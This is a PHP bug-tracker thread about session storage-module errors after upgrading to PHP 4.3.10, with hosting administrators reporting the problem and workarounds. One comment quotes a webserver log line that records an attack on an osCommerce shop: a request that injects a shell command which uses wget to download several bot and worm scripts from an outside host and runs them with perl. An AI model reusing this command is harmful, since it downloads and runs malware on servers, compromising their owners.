ID: 25876 Comment by: mbi at euro-ip dot net Reported By: golden at riscom dot com Status: Feedback Bug Type: Session related Operating System: freebsd 4.8 PHP Version: 4.3.3 New Comment:
FreeBSD 4.10 and PHP 4.3.10 How to reproduce: - Running a system with about 1000 virthosts, some of the users use PHP scripts that configure own session handlers. - Most of the users don't configure an alternate session handler and start their session with a simple "session_start();" statement, but some of them do, mostly by installing some kind of forum or weblog tool. Users that don't set an alternate session handler or set their session handler to "files" via ini_set in every file they open regulary get confronted with a PHP error like: PHP Fatal error: session_start(): Failed to initialize storage module: user (....) Putting "ini_set ( "session.save_handler", "files" );" in every file with a "session_start();" in it solved it for our own sites, but doesn't go easy with all the other users affected. For us, this started after upgrading from PHP 4.3.9 to 4.3.10. Putting "php_value session.save_handler files" in .htaccess files or Apache config files didn't help to fix the problem. Disabling all sites with "user" session handlers stopped the error from occuring, but this is obviously not what we want. Previous Comments: ------------------------------------------------------------------------ [2004-12-27 11:45:40] anilk510 at yahoo dot co dot in What is the path to session.save_path ..please let me know ------------------------------------------------------------------------ [2004-12-27 11:41:02] phpbugs at expires-200501 dot dpits dot com i found some interesting. here the php-errorlog: [26-Dec-2004 15:37:40] PHP Warning: Unknown(): A session is active. You cannot change the session module's ini settings at this time. in Unknown on line 0 [26-Dec-2004 15:38:47] PHP Fatal error: session_start(): Failed to initialize storage module: user (path: /tmp/php_sessions) in /www/x/main.inc.php on line 20 and in the webserver-log i found this attack: x.x.x.x - - [26/Dec/2004:15:37:40 +0100] "GET /shop.php/cPath/2?osisSid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.0" 200 29102 "-" "LWP::Simple/5.53" (it is OSCommerce-Shop) Thankyou... ------------------------------------------------------------------------ [2004-12-27 10:34:09] [EMAIL PROTECTED] Not reproducible for me with Apache 1.3.29 & php4-CVS. Please provide more info on how to reproduce it. ------------------------------------------------------------------------ [2004-12-27 10:17:10] admin at ehost dot pl the same problem Apache 1.3.33 RedHat ES 3 and Redhat 9.0 from the moment that we upgrade php to 4.3.10 ------------------------------------------------------------------------ [2004-12-27 10:12:03] support at nthost dot ru Experiencing this bug on FreeBSD 4.9 with PHP 4.3.10. ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/25876 -- Edit this bug report at http://bugs.php.net/?id=25876&edit=1